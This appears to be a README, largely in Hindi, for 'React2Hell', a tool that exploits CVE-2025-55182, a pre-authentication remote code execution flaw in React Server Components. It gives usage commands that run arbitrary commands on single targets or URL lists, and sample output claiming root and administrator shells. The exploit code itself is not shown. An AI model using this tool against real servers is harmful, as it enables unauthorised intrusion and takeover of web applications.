
CVE-2025-55182-advanced-scanner
@#React2Hell — CVE-2025-55182 शोषण
🔥 Next.js / React सर्वर रिमोट कोड निष्पादन (RCE) शोषण
█████▄ ▄▄▄▄▄ ▄▄▄ ▄▄▄▄ ▄▄▄▄▄▄ ████▄ ▄▄▄▄▄ ██ ██ ▄▄▄▄▄ ▄▄ ▄▄
██▄▄██▄ ██▄▄ ██▀██ ██▀▀▀ ██ ▄██▀ ██▄▄ ██████ ██▄▄ ██ ██
██ ██ ██▄▄▄ ██▀██ ▀████ ██ ███▄▄ ▄▄▄███ ██ ██ ██▄▄▄ ██▄▄▄ ██▄▄▄
{MAGENTA} Next.js/React सर्वर RCE शोषण — CVE-2025-55182
लेखक: Ankit Pandey GitHub: https://github.com/ankitspandey07
🚀 React2Shell — सुरक्षा परीक्षण उपयोगिता 🚀
════════════════════════════════════════════════════════════════════════
usage: new.py [-h] [-u URL] [-l LIST] -c COMMAND [--proxy PROXY] [--proxy-https PROXY_HTTPS]
React2Hell एक शक्तिशाली शोषण उपकरण है जो CVE-2025-55182 का परीक्षण और शोषण करने के लिए डिज़ाइन किया गया है, जो Next.js और React सर्वर एक्शन को प्रभावित करने वाली एक गंभीर रिमोट कोड निष्पादन भेद्यता है।
React सर्वर घटकों के संस्करण 19.0.0, 19.1.0, 19.1.1, और 19.2.0 में एक प्री-ऑथेंटिकेशन रिमोट कोड निष्पादन भेद्यता मौजूद है, जिसमें निम्नलिखित पैकेज शामिल हैं: react-server-dom-parcel, react-server-dom-turbopack, और react-server-dom-webpack। कमजोर कोड HTTP अनुरोधों से सर्वर फ़ंक्शन एंडपॉइंट पर पेलोड को असुरक्षित रूप से डिसिरियलाइज़ करता है।
python Scanner.py -u https://target.com -c "whoami"
python Scanner.py -l urls.txt -c "whoami"
python Scanner.py -u https://target.com -c "whoami" --proxy 127.0.0.1:8080
python Scanner.py -u https://target.com -c "whoami" --proxy-https 127.0.0.1:8080
http://site1.com
https://site2.com
http://192.168.1.10:3000
PS D:\Ankitspandey07\React2Hell> python.exe .\Scanner.py -l .\list.txt -c whoami
█████▄ ▄▄▄▄▄ ▄▄▄ ▄▄▄▄ ▄▄▄▄▄▄ ████▄ ▄▄▄▄▄ ██ ██ ▄▄▄▄▄ ▄▄ ▄▄
██▄▄██▄ ██▄▄ ██▀██ ██▀▀▀ ██ ▄██▀ ██▄▄ ██████ ██▄▄ ██ ██
██ ██ ██▄▄▄ ██▀██ ▀████ ██ ███▄▄ ▄▄▄███ ██ ██ ██▄▄▄ ██▄▄▄ ██▄▄▄
{MAGENTA} Next.js/React Server RCE Exploit — CVE-2025-55182
Author: Ankit Pandey GitHub: https://github.com/ankitspandey07
🚀 React2Shell — Security Testing Utility 🚀
════════════════════════════════════════════════════════════════════════
[+] Loaded 3 targets
════════════════════════════════════════════════════════════════════════
[→] Target: http://evil.com:3113/
[→] Exec: whoami
[✓] VULNERABLE — RCE Successful!
------------------------------------------------------------
root
------------------------------------------------------------
────────────────────────────────────────────────────────────────────────
[→] Target: http://example.lab:2000/
[→] Exec: whoami
[✗] Not vulnerable — Status: 200
────────────────────────────────────────────────────────────────────────
[→] Target: https://tale.lab:3000/
[→] Exec: whoami
[✓] VULNERABLE — RCE Successful!
------------------------------------------------------------
win-1fl835ovldc\\administrator
------------------------------------------------------------
────────────────────────────────────────────────────────────────────────
[✓] Scan complete — Vulnerable: 2
PS D:\Ankitspandey07\React2Hell>
यह उपकरण विशेष रूप से शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए बनाया गया है। स्पष्ट प्राधिकरण के बिना इसका उपयोग सिस्टम पर न करें। आप अपने कार्यों के लिए स्वयं जिम्मेदार हैं।
यदि इस शोषण ने आपकी मदद की, तो GitHub पर ⭐ छोड़ने पर विचार करें ❤️
Ankit Pandey; GitHub: https://github.com/Ankitspandey07
गर्व और जुनूनी पेंटेस्टर द्वारा 🔥 के साथ बनाया गया, जो हर कदम पर सीखने में सफल होता है।